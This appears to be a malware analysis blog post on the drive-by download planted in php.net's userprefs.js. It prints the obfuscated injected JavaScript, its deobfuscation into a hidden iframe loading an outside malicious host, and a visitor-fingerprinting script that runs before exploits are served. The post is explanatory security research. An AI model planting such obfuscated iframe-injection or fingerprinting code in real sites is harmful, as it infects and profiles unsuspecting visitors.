The drive-by download from php.net
The infection starts from a modified JavaScript file which was included from php.net/index.php (userprefs.js). On that file the following code was appended:
(function(Anv) {
var LUI = "M\xaa\xb0\xa9\xf5n-\x92\xe0\xb5S[...]",
b2 = ["\x73\x70\x6c\x69\x74", Ud = (0x84 ^ 0xc3) * (0xf9 - 0xf3) / 2, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
VV = "\xc3\x9f\xae\x15\xf9\x928\xb4{\xcbV\x00D?GD|\x9f{:[\xa8\xd0\x9a",
NQ = LUI["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, VV[b2[2]]);
VDG = function(Av) {
var sCV, j9, nB = j9 = "",
GC = 0;
Av = Av[b2[0]](nB);
for (sCV in Av) {
if (Av[b2[3]](sCV)) {
j9 += SjB(Av[sCV], NQ[b2[0]](nB)[GC %= NQ[b2[2]]]);
GC++;
}
}
return (j9);
};
NQ = VDG(VV);
Anv[VDG("oVkD")](VDG(LUI[VDG("yUh[|ZiLm")](VV[VDG("fEdO|@")])))
})(window, SjB = function(uC, lp, XN, OA) {
uC = uC[XN = "\x63" + (OA = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0);
return (String["\x66\x72\x6f\x6d\x43" + OA](uC & Ud | ((uC & (~Ud & 0xff)) ^ (lp[XN](0) & (~Ud & 0xff)))))
});
This is a deobfuscator, which generates more code by deobfuscating the string in the LUI variable.
/*IlcnDVqHsxH0yOFzDNP718Jyuru3K*/ /*87yjoFLgVnhk*/ /*fhcDLHyIuwbr2DEf3xXMo0*/
(function(dzI) {
Ud = 0x0b * (0xbb - 0xb9);
var eOa = (function(z) {
var a = [VDG("\xaa\xd3\xedH\xbd\xcdE\xcc,\x84%n4"), VDG("\xbe\xc8\xec]\xa1"), VDG("\xa1\xc4\xe1N\xa1\xdc"), VDG("\xba\xd5\xf1E\xac"), VDG("\xa8\xd1\xf8L\xa7\xccC\xc8\x20\x85$"), VDG("\xae\xc4\xfcl\xa5\xcdm\xc5'\x9d3B9U(/.\xe8$m"), VDG("\x84\xc0\xfcA"), VDG("\xa6\xd7\xed[\xaf\xc4o\xd7"), VDG("\xb9\xce\xfb@\xbd\xc1o\xce"), VDG("\xa5\xc4\xee]")],
b = [VDG("\xad\xce\xeb\\\xa4\xcdn\xd4"), VDG("\xaf\xcd\xe7F\xbb"), VDG("\xbb\xc0\xe6M\xa6\xc5"), VDG("\xa5\xc4\xe6N\xbd\xc0"), VDG("\xba\xd3\xeb")],
s = [VDG("\xad\xc8\xfe"), VDG("\xa0\xc7\xfaH\xa4\xcd")],
r = [VDG("\xa1\xc8\xecM\xac\xc6"), VDG("\xa8\xc3\xfbF\xa5\xddt\xc5"), VDG("\xe4\x90\xb8\x19\xf9\x98p\xd8"), VDG("\xa1\xd5\xfcY\xf3\x87/\xd5;\x85nw(h*\x20\x15\xfa+&*\xcf\xee\xd5\xa2\x8e\xfb]\xa8\xdc.\xc8=\x84"), VDG("\xf8\x91\xf8Q")],
t = [0, 0, 0, 0, 0];
t[3] = (t[2] = z[b[0]][a[0]](s[1]))[a[3]];
t[2][b[4]] = r[3];
(t[1] = (t[0] = z[b[0]][a[0]](s[0]))[a[3]])[a[1]] = t[1][a[2]] = r[4];
t[1][a[7]] = r[0];
t[1][a[8]] = r[1];
t[1][a[9]] = r[2];
t[0][a[4]](t[2]);
return t[0];
})(dzI),
d = dzI[VDG("\xad\xce\xeb\\\xa4\xcdn\xd4")],
i, b, l = VDG("\xa5\xc4\xe6N\xbd\xc0"),
t = VDG("\xae\xc4\xfcl\xa5\xcdm\xc5'\x9d3B9U(/.\xe8$m"),
m = dzI[VDG("\x84\xc0\xfcA")];
if (eOa) {
if (b = d[t](VDG("\xab\xce\xecP"))[0])((i = d[t](VDG("\xad\xc8\xfe")))[l] ? i[m[VDG("\xaf\xcd\xe7F\xbb")](m[VDG("\xbb\xc0\xe6M\xa6\xc5")]() * i[VDG("\xa5\xc4\xe6N\xbd\xc0")])] : b)[VDG("\xa8\xd1\xf8L\xa7\xccC\xc8\x20\x85$")](eOa);
else d[VDG("\xbe\xd3\xe1]\xac")](eOa[VDG("\xa6\xd4\xfcL\xbb\xe0T\xed\x05")]);
}
delete SjB;
delete VDG;
delete Ud;
})(window);
So now that we have the actual code that performs the attack we can see that it is injecting an iframe in the page’s DOM tree. Although this is the deobfuscated part of the code, it is still not easy to understand what is happening. It even has code dependencies with its deobfuscator (like function VDG).
By looking more closely to the “e0a” function we can deobfuscate it further to the following code:
a = ["createElement", "width", "height", "style", "appendChild", "getElementsByTagName", "Math", "overflow", "position", "left"]
b = ["document", "floor", "random", "length", "src"]
s = ["div", "iframe"]
r = ["hidden", "absolute", "-10000px", "http://url.whichusb.co.uk/stat.htm", "10px"]
t = [0, 0, 0, 0, 0]
iframe_style_obj = (iframe_obj = window.document.createElement("iframe")).style
iframe_obj.src = "http://url.whichusb.co.uk/stat.htm"
(div_style_obj = (div_obj = window.document.createElement("div")).width = div_style_obj.height = "10px"
div_style_obj.overflow = "hidden"
div_style_obj.position = "absolute"
div_style_obj.left = "-10000px"
div_obj.appendChild(iframe_obj)
return div_obj
Now it is clear that the injected iframe is of the following form:
<div style="height: 10px; width: 10px; overflow: hidden; position: absolute; left: -10000px;"><iframe src="http://url.whichusb.co.uk/stat.htm"></iframe></div>
It is interesting that the iframe is fullsized but wrapped into a div element that is hidden. The code in the iframe fingerprints the user before serving any exploits.
var os = 0;
try {
var os = PluginDetect.OS;
} catch (e) {}
var jav = 0;
try {
//var javaversion=PluginDetect.getVersion('Java','./getjavainfo.jar');
var javaversion = 0;
if (javaversion != null) {
jav = 1;
}
} catch (e) {}
var acrobat = new Object();
acrobat.installed = false;
acrobat.version = 0;
var pdfi = 0;
try {
var adobe = PluginDetect.getVersion("AdobeReader");
if (adobe != null) {
pdfi = 1;
}
} catch (e) {}
var resoluz = 0;
try {
resoluz = screen.width;
} catch (e) {}
document.write('');
var id = resoluz + '|' + jav + '|' + pdfi;
var frm = document.forms[0];
frm.id.value = id;
frm.submit();Resulting fingerprint was: id=800%7C1%7C1
This is “screen.width|java_enabled|pdf_enabled”, although the check for Java seems to be bugged and always true. Very interesting that they forward to their server the screen width of the victim.
At this point a static HTML page is served to the victim with multiple Java/Flash/IE exploits. By looking more closely into the Internet Explorer exploit they tried, it seems to be CVE-2013-2551.
Although I have seen this obfuscation technique before, I’m really interested to see where it originates from and if there are any tools that automatically rewrite the static function calls and array references to their resulting values.